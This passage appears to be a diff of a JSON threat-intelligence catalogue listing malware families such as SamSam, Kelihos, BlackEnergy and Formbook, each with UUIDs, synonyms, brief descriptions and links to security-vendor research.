- { - "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", - "value": "Misfox", - "description": "", - "meta": { - "synonyms": [ - "ModPack", - "MixFox" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] - } - }, - { - "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] - } - }, - { - "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", - "value": "ZooPark", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/whos-who-in-the-zoo/85394" - ] - } - }, - { - "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" - ] - } - }, - { - "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", - "value": "Kelihos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", - "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", - "https://en.wikipedia.org/wiki/Kelihos_botnet" - ] - } - }, - { - "uuid": "826c31ca-2617-47e4-b236-205da3881182", - "value": "Reaver", - "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" - ] - } - }, - { - "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "", - "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], - "refs": [ - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] - } - }, - { - "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", - "value": "Trochilus RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/5loyd/trochilus/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] - } - }, - { - "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", - "value": "AthenaGo RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintel.com/2017/02/athena-go.html" - ] - } - }, - { - "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] - } - }, - { - "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", - "value": "Volgmer", - "description": "", - "meta": { - "synonyms": [ - "FALLCHILL", - "Manuscrypt" - ], - "type": [], - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-318B" - ] - } - }, - { - "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", - "value": "MBRlock", - "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", - "meta": { - "synonyms": [ - "DexLocker" - ], - "type": [], - "refs": [ - "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", - "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", - "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", - "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" - ] - } - }, - { - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" - ] - } - }, - { - "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", - "value": "BlackEnergy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", - "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" - ] - } - }, - { - "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", - "value": "AdWind", - "description": "", - "meta": { - "synonyms": [ - "JBifrost", - "JSocket", - "AlienSpy", - "UNRECOM", - "Frutas" - ], - "type": [], - "refs": [ - "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", - "http://malware-traffic-analysis.net/2017/07/04/index.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", - "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", - "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html" - ] - } - }, - { - "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] - } - }, - { - "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] - } - }, - { - "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", - "value": "MPK", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "", - "meta": { - "synonyms": [ - "McRAT", - "Hydraq" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", - "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", - "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures" - ] - } - }, - { - "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - } - }, - { - "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", - "value": "Buterat", - "description": "", - "meta": { - "synonyms": [ - "spyvoltar" - ], - "type": [], - "refs": [ - "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" - ] - } - }, - { - "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer.", - "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], - "refs": [ - "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", - "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", - "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" - ] - } - }, - { - "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - "value": "KeRanger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", - "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" - ] - } - }, - { - "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", - "value": "Troldesh", - "description": "", - "meta": { - "synonyms": [ - "Shade" - ], - "type": [], - "refs": [ - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" - ] - } - }, - { - "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", - "value": "KHRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", - "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" - ] - } - }, - { - "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", - "value": "Mocton", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", - "value": "Stantinko", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" - ] - } - }, - { - "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", - "value": "Ransoc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" - ] - } - }, - { - "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", - "value": "NexusLogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", - "https://twitter.com/PhysicalDrive0/status/842853292124360706" - ] - } - }, - { - "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", - "value": "Decebal", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", - "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" - ] - } - }, - { - "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", - "value": "TinyLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" - ] - } - }, - { - "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", - "value": "Cobra Carbon System", - "description": "", - "meta": { - "synonyms": [ - "Carbon" - ], - "type": [], - "refs": [ - "https://github.com/hfiref0x/TDL", - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", - "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" - ] - } - }, - { - "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] - } - }, - { - "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", - "value": "Umbreon", - "description": "", - "meta": { - "synonyms": [ - "Espeon" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", - "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" - ] - } - }, - { - "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", - "value": "Batel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", - "value": "ZXShell", - "description": "", - "meta": { - "synonyms": [ - "Sensocode" - ], - "type": [], - "refs": [ - "https://github.com/smb01/zxshell", - "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://blogs.rsa.com/cat-phishing/" - ] - } - }, - { - "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "", - "meta": { - "synonyms": [ - "getkys" - ], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", - "https://community.rsa.com/thread/185437", - "https://www.symantec.com/connect/blogs/sykipot-attacks" - ] - } - }, - { - "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", - "value": "StealthAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - } - }, - { - "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", - "value": "Upatre", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://secrary.com/ReversingMalware/Upatre/" - ] - } - }, - { - "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] - } - }, - { - "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", - "value": "NetSupportManager RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.netsupportmanager.com/index.asp", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" - ] - } - }, - { - "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", - "value": "Jolob", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" - ] - } - }, - { - "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", - "value": "Karius", - "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://research.checkpoint.com/banking-trojans-development/", - "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" - ] - } - }, - { - "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - } - }, - { - "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", - "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", - "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", - "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" - ] - } - }, - { - "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] - } - }, - { - "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://laanwj.github.io/2016/08/28/feintcloud.html", - "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", - "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", - "https://laanwj.github.io/2016/08/22/blatsting.html", - "https://laanwj.github.io/2016/09/11/buzzdirection.html", - "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", - "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", - "https://laanwj.github.io/2016/09/01/tadaqueos.html", - "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" - ] - } - }, - { - "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", - "value": "CrypMic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] - } - }, - { - "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", - "value": "Rokku", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", - "value": "Zeus Sphinx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/", - "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", - "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/" - ] - } - }, - { - "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", - "value": "MimiKatz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/gentilkiwi/mimikatz", - "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", - " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - } - }, - { - "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", - "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", - "https://isc.sans.edu/diary/23417" - ] - } - }, - { - "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "", - "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], - "refs": [ - "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", - "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf" - ] - } - }, - { - "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", - "value": "Nexster Bot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/benkow_/status/789006720668405760" - ] - } - }, - { - "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", - "value": "Mosquito", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" - ] - } - }, - { - "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", - "value": "Moker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://breakingmalware.com/malware/moker-part-2-capabilities/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", - "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", - "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" - ] - } - }, - { - "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", - "value": "Zeus MailSniffer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] - } - }, - { - "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.rekings.com/ispy-customers/", - "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" - ] - } - }, - { - "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] - } - }, - { - "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", - "value": "BernhardPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" - ] - } - }, - { - "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "", - "meta": { - "synonyms": [ - "Revir" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", - "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] - } - }, - { - "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", - "value": "Kovter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", - "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/" - ] - } - }, - { - "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] - } - }, - { - "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", - "value": "Lethic", - "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.malware-traffic-analysis.net/2017/11/02/index.html", - "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", - "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", - "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" - ] - } - }, - { - "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", - "value": "Unidentified 034", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" - ] - } - }, - { - "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", - "value": "Siggen6", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", - "value": "ComradeCircle", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/816926371867926528" - ] - } - }, - { - "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "", - "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] - } - }, - { - "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", - "value": "Tofsee", - "description": "", - "meta": { - "synonyms": [ - "Gheg" - ], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/tofsee-en/", - "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", - "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" - ] - } - }, - { - "uuid": 